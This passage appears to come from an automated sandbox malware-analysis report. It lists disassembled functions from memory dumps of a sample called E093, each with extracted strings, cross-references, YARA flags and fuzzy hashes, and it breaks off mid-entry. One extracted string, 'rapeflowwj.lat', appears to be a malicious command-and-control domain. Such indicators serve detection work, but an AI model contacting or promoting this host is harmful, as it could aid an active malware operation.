Function 0091CD78 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

bc, xrefs: 0091D104
v, xrefs: 0091D02D
,JHj, xrefs: 0091CFC4
Hs, xrefs: 0091CF4A

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 38648fff23acc96b4147659c94246fa811dd34feff959ed5223fb238b0221b09
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: EB814971A083D08BE3348F3584517ABBBD2AFE3304F19895DD4D95B786C675480ACB52

Function 00914031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

7N1@, xrefs: 00914137, 00914148
/G$I, xrefs: 0091407D
{\}, xrefs: 009140A5
Fg)i, xrefs: 009140BD

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: /G$I$7N1@$Fg)i${\}
API String ID: 0-149357369
Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction ID: e7bf53a1dde86597cee4f936ba20256628f06a899fe667193ce6ed1f085d94a3
Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction Fuzzy Hash: 4A21B8B551D3809BC314CF66984161BFBE2BBD2704F29A92CF0C85B255D3748902CF8B

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

i, xrefs: 00417B2A
,, xrefs: 004183A1
r}A, xrefs: 00417D60

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417747
i, xrefs: 00417B2A
r}A, xrefs: 00417D60

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

C], xrefs: 0041D471
|F, xrefs: 0041D40A
34, xrefs: 0041D46A

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 0090D5E7 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

34, xrefs: 0090D6D1
C], xrefs: 0090D6D8
|F, xrefs: 0090D671

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction ID: 53dea7f333ccb0b6e7fd82bb30411bfc3479b94e4c7fb5ad36fb2dc9fdcfa7ad
Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction Fuzzy Hash: 04C12EB69093518FC720CF68C88166BB3F6FF95314F18895CE8D58B390E775AA05CB92

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

TQ][, xrefs: 0042E307
sWK), xrefs: 0042E049
Ef, xrefs: 0042E24E

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 0091E250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

TQ][, xrefs: 0091E56E
Ef, xrefs: 0091E4B5
sWK), xrefs: 0091E2B0

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction ID: 32680599e5e5945a30bfbbb9a090995fcf94e2a7968b5aee2d7fa76c1de67049
Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction Fuzzy Hash: E4B1043061D3D08EDB39CF2994907ABBBE49FA7304F08499CD4D95B282D775854ACB63

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

/pqr, xrefs: 0041B30E
+|-~, xrefs: 0041B306
_, xrefs: 0041B428

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 0090B547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

/pqr, xrefs: 0090B575
+|-~, xrefs: 0090B56D
_, xrefs: 0090B68F

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction ID: 08a415e7fc929938ec81d6733a6c8f635ae6bab8ca05352d3c4144e8aba8340e
Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction Fuzzy Hash: 43812C5570459006DB2CDF3888A373BBAD6DF84308B2991BEC955CFBA7E938C502874E

Function 00905FD3 Relevance: 3.8, Strings: 3, Instructions: 37COMMON

Download Yara Rule

Strings

NDNK, xrefs: 00905FEC
X, xrefs: 00906039
WJeX, xrefs: 0090604C

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: NDNK$WJeX$X
API String ID: 0-3631875968
Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction ID: 4cb6208b0921dc7e7379c3d5516e93913bd472cf9d0cc0ca26d625591cbcd557
Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction Fuzzy Hash: D501BCB051D790CFD3B19F259859AAFBFE4AB92310F21492CC5C9AA211DB3688008B03

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

Dx, xrefs: 0040E139
rapeflowwj.lat, xrefs: 0040DF76, 0040E316

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 008FDE40 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

Dx, xrefs: 008FE3A0
rapeflowwj.lat, xrefs: 008FE1DD, 008FE57D

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 255b1b0c01bbc556ed0a41289804d0c38604e2260f8eaedecdce7b332a14b0d6
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: 80F1CCB050D3D18ED335CF658494BEBBBE1EB92314F144AADC8D99B652C735090ACB93

Function 0091DCBC Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

4*VP, xrefs: 0091E18B
0K), xrefs: 0091E180

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction ID: ee0fa0f860043fd84ea0c5dc758f82f32c45120ca248bcc29be48a47389392c5
Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction Fuzzy Hash: 32D1263061D3D08ED7258B3984507EBBBE59FA7314F1889ADD4C98B382C7798846CB62

Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

4*VP, xrefs: 0042DF24
0K), xrefs: 0042DF19

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

i, xrefs: 00417B2A
r}A, xrefs: 00417D60

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418590
P<?, xrefs: 00418680

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 00928A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 00928B5C

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: /,-
API String ID: 0-1700940157
Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction ID: e7fd073f6dc7a8aefa879a1a5db102a33a3dbdc660a9c0035f1fe5e5a13a301d
Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction Fuzzy Hash: F3B19B7170A3204BD724DF24E881A7BB7A6EBD2314F19893CE585572D9CB31EC06C796

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 0091B3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0091B5D5

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: e8a3b969a104ceb19484bc98ac0381c26b1d09eee07131c91ebec5adcac452ce
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: DA71F832B083598BD714CE2DC4803AEB7E7ABC5760F29C96DE4949B3A1D735DC858B42

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 0090DAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

klm, xrefs: 0090DC13

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction ID: 9ee2d8d6c73610a02f7874173ce3013a1a550a4afda27ba339259507b4367389
Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction Fuzzy Hash: FD51E1B46093508FD714DF64C45276BB7F2FFA6308F18996CE4D68B290E7398901CB1A

Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 00918DC8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00918E87

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction ID: 68e1449df9d53a8d0a1644074db59ffafe4c53f8f2efc7e31989e2ef175b348a
Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction Fuzzy Hash: 5D412FB0E0121D8BCB20DF98DC917EEB7B1FF45310F098299E545ABB94E7785982DB90

Function 0092C9CE Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0092C9F7

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
Instruction ID: 172527347eb03399450c1366ceec018f2489fed6f0e5cd33e580db29728088bd
Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
Instruction Fuzzy Hash: 7B319479B402259FEB18CF58DC95BBEB3B2BB8A300F245128E541A73D4CB75AD018B94

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
